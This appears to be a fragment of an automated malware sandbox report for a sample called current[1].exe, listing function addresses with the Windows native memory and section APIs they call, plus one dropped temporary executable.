Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462440 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E700 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0042E700
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460870 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00460870
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045E927 NtOpenSection,		0_2_0045E927
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462990 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00462990
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045EAE9 NtMapViewOfSection,		0_2_0045EAE9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460A90 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00460A90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045EFF5 NtClose,		0_2_0045EFF5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451140 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00451140
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045A160 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045A160
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044E120 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0044E120
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045D1D0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045D1D0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004641E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004641E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439260 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00439260
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004632A0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004632A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451370 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00451370
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045D400 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045D400
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004394C0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004394C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004634F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004634F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004434B0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004434B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C550 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045C550
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437530 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00437530
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004645E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004645E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004396E0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004396E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004626F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004626F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C790 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045C790
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00464800 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00464800
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004638F0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_004638F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439910 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00439910
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E920 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CA90 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463B20 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00463B20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462BF0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00462BF0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CD20 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045CD20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462F00 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00462F00
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CF80 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0045CF80
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463FA0 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00463FA0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3167 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A3167
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D1E7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079D1E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4207 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A4207
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A3C7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079A3C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007913A7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007913A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078E387 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0078E387
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4447 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A4447
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D437 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079D437
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007794C7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007794C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3507 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A3507
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007915D7 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007915D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D667 NtAllocateVirtualMemory,NtFreeVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079D667
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A26A7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3757 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A3757
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779727 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00779727
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00783717 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00783717
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C7B7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079C7B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00777797 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00777797
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4847 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A4847
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076E967 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0076E967
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2957 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A2957
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779947 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00779947
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C9F7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079C9F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4A67 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A4A67
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0AD7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A0AD7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779B77 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_00779B77
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3B57 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A3B57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2BF7 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A2BF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076EB87 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0CF7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A0CF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CCF7 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3D87 NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A3D87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2E57 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_007A2E57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CF87 NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtFreeVirtualMemory,		0_2_0079CF87

Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462440		0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E700		0_2_0042E700
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460870		0_2_00460870
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004238A0		0_2_004238A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045E927		0_2_0045E927
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462990		0_2_00462990
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00424A2F		0_2_00424A2F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045EAE9		0_2_0045EAE9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00460A90		0_2_00460A90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00422DE0		0_2_00422DE0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00425FCA		0_2_00425FCA
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437048		0_2_00437048
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041E070		0_2_0041E070
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00403000		0_2_00403000
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00414010		0_2_00414010
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045E0C8		0_2_0045E0C8
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043D0F0		0_2_0043D0F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451140		0_2_00451140
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00411150		0_2_00411150
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045A160		0_2_0045A160
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042716F		0_2_0042716F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043911F		0_2_0043911F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044E120		0_2_0044E120
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044713B		0_2_0044713B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045D1D0		0_2_0045D1D0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004641E0		0_2_004641E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439260		0_2_00439260
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044A22D		0_2_0044A22D
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00459230		0_2_00459230
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448B92		0_2_00448B92
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044B290		0_2_0044B290
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004632A0		0_2_004632A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044E340		0_2_0044E340
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045F352		0_2_0045F352
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00451370		0_2_00451370
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042B318		0_2_0042B318
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00427325		0_2_00427325
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004143C0		0_2_004143C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041F3A0		0_2_0041F3A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045F456		0_2_0045F456
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00432456		0_2_00432456
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004394C0		0_2_004394C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004634F0		0_2_004634F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004434B0		0_2_004434B0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C550		0_2_0045C550
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437530		0_2_00437530
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004645E0		0_2_004645E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044459F		0_2_0044459F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004515A0		0_2_004515A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045A5B2		0_2_0045A5B2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00412670		0_2_00412670
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448614		0_2_00448614
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004396E0		0_2_004396E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00428680		0_2_00428680
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00443700		0_2_00443700
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043172D		0_2_0043172D
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041E7C0		0_2_0041E7C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004247D2		0_2_004247D2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004277E0		0_2_004277E0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045C790		0_2_0045C790
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00414860		0_2_00414860
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00461875		0_2_00461875
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042A87A		0_2_0042A87A
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00430802		0_2_00430802
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004638F0		0_2_004638F0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_004268B3		0_2_004268B3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00439910		0_2_00439910
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00413920		0_2_00413920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042E920		0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00432930		0_2_00432930
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042BA2F		0_2_0042BA2F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CA90		0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042CA9C		0_2_0042CA9C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043AB07		0_2_0043AB07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463B20		0_2_00463B20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00412BD0		0_2_00412BD0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462BF0		0_2_00462BF0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00437C01		0_2_00437C01
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00425C07		0_2_00425C07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00445C17		0_2_00445C17
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042AC22		0_2_0042AC22
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0044ACC4		0_2_0044ACC4
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042CCB5		0_2_0042CCB5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00447D50		0_2_00447D50
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00429D65		0_2_00429D65
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045DD68		0_2_0045DD68
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00411D70		0_2_00411D70
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CD20		0_2_0045CD20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041CD30		0_2_0041CD30
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0041FD80		0_2_0041FD80
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00445E1C		0_2_00445E1C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0042DEC0		0_2_0042DEC0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00431EF5		0_2_00431EF5
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00459E90		0_2_00459E90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045DF5C		0_2_0045DF5C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00462F00		0_2_00462F00
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0043CF20		0_2_0043CF20
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448FEB		0_2_00448FEB
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00448FF0		0_2_00448FF0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0045CF80		0_2_0045CF80
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00463FA0		0_2_00463FA0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00763047		0_2_00763047
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A0F7		0_2_0079A0F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00786083		0_2_00786083
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3167		0_2_007A3167
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077215C		0_2_0077215C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076E127		0_2_0076E127
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D1E7		0_2_0079D1E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079E1C3		0_2_0079E1C3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077D187		0_2_0077D187
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00754277		0_2_00754277
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00743267		0_2_00743267
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00789252		0_2_00789252
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00789257		0_2_00789257
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00766231		0_2_00766231
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4207		0_2_007A4207
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075E2D7		0_2_0075E2D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007772AF		0_2_007772AF
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077D357		0_2_0077D357
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079E32F		0_2_0079E32F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007673D6		0_2_007673D6
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A3C7		0_2_0079A3C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007513B7		0_2_007513B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007873A2		0_2_007873A2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007913A7		0_2_007913A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779386		0_2_00779386
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078E387		0_2_0078E387
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4447		0_2_007A4447
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079D437		0_2_0079D437
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078B4F7		0_2_0078B4F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007794C7		0_2_007794C7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078A494		0_2_0078A494
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00799497		0_2_00799497
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076B57F		0_2_0076B57F
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00788DF9		0_2_00788DF9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3507		0_2_007A3507
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007915D7		0_2_007915D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079F5B9		0_2_0079F5B9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078E5A7		0_2_0078E5A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076758C		0_2_0076758C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00754627		0_2_00754627
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075F607		0_2_0075F607
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007556E7		0_2_007556E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079F6BD		0_2_0079F6BD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A26A7		0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3757		0_2_007A3757
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779727		0_2_00779727
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00783717		0_2_00783717
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C7B7		0_2_0079C7B7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00777797		0_2_00777797
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078887B		0_2_0078887B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A4847		0_2_007A4847
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079A819		0_2_0079A819
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00791807		0_2_00791807
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00784806		0_2_00784806
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007688E7		0_2_007688E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007528D7		0_2_007528D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076E967		0_2_0076E967
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00783967		0_2_00783967
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779947		0_2_00779947
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079C9F7		0_2_0079C9F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00771994		0_2_00771994
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00770A69		0_2_00770A69
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00767A47		0_2_00767A47
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00764A39		0_2_00764A39
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075EA27		0_2_0075EA27
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076AAE1		0_2_0076AAE1
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0AD7		0_2_007A0AD7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00779B77		0_2_00779B77
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3B57		0_2_007A3B57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00766B1A		0_2_00766B1A
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00763B07		0_2_00763B07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2BF7		0_2_007A2BF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00772B97		0_2_00772B97
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00772B94		0_2_00772B94
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076EB87		0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00753B87		0_2_00753B87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079EB8E		0_2_0079EB8E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A0CF7		0_2_007A0CF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CCF7		0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00764C96		0_2_00764C96
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0077AD6E		0_2_0077AD6E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079ED50		0_2_0079ED50
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076CD03		0_2_0076CD03
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A3D87		0_2_007A3D87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00785E7E		0_2_00785E7E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00765E6E		0_2_00765E6E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00777E68		0_2_00777E68
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_007A2E57		0_2_007A2E57
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076AE89		0_2_0076AE89
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0078AF2B		0_2_0078AF2B
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0076CF1C		0_2_0076CF1C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00751FD7		0_2_00751FD7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079DFCF		0_2_0079DFCF
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00769FCC		0_2_00769FCC
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00787FB7		0_2_00787FB7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0075CF97		0_2_0075CF97
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_0079CF87		0_2_0079CF87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 0_2_00831166		0_2_00831166
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Code function: 1_2_00E96D00		1_2_00E96D00

Source: Joe Sandbox View

